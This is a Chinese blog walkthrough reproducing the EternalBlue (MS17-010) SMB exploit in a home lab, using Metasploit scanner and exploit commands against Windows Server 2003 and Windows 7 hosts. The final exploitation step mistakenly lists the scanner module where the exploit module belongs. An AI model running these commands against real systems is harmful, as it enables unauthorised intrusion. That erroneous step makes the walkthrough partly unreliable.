永恒之蓝（MS17010）漏洞复现

大家好，又见面了，我是你们的朋友全栈君。

文章目录

• 介绍：
• 准备
• 开始复现
  • 正式开始利用

介绍：

永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具，其中就包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。

恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，就可以进行非法操作。

准备

1.kali的ip：192.168.0.128

在这里插入图片描述

2.WindowsServer2003的ip：192.168.0.200

在这里插入图片描述

3.测试连通性：

在这里插入图片描述

在这里插入图片描述

开始复现

1.kali进入msf。 命令：msfconsole

在这里插入图片描述

2.search ms17-010 #搜索ms17010

在这里插入图片描述

• use auxiliary/scanner/smb/smb_ms17_010 #使用模块
• show options #显示选项

在这里插入图片描述

• set RHOSTS 192.168.0.200 # 设置目标主机

在这里插入图片描述

• 输入run或者exploit执行
• 发现存在漏洞

在这里插入图片描述

3.通过使用exploit/windows/smb/ms17_010_eternalblue模块进行漏洞攻击

• use exploit/windows/smb/ms17_010_eternalblue
• set rhosts 192.168.0.200 #设置被攻击端IP
• run #执行

在这里插入图片描述

发现这个exp只能对64位的系统执行攻击。惨兮兮！！ 哎，重来吧。 win7ip：192.168.0.129

在这里插入图片描述

测试连通也没问题

正式开始利用

1. use auxiliary/scanner/smb/smb_ms17_010 # 使用模块 set rhosts 192.168.0.129 #设置目标IP run

在这里插入图片描述

发现存在漏洞。 2.漏洞利用

• use auxiliary/scanner/smb/smb_ms17_010
• set rhosts 192.168.0.129
• run

在这里插入图片描述

发现攻击成功。 然后就可以为所欲为了。

在这里插入图片描述

发现有乱码，可以使用chcp 65001命令消除乱码。

在这里插入图片描述

至此复现结束。

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/135847.html原文链接：https://javaforall.cn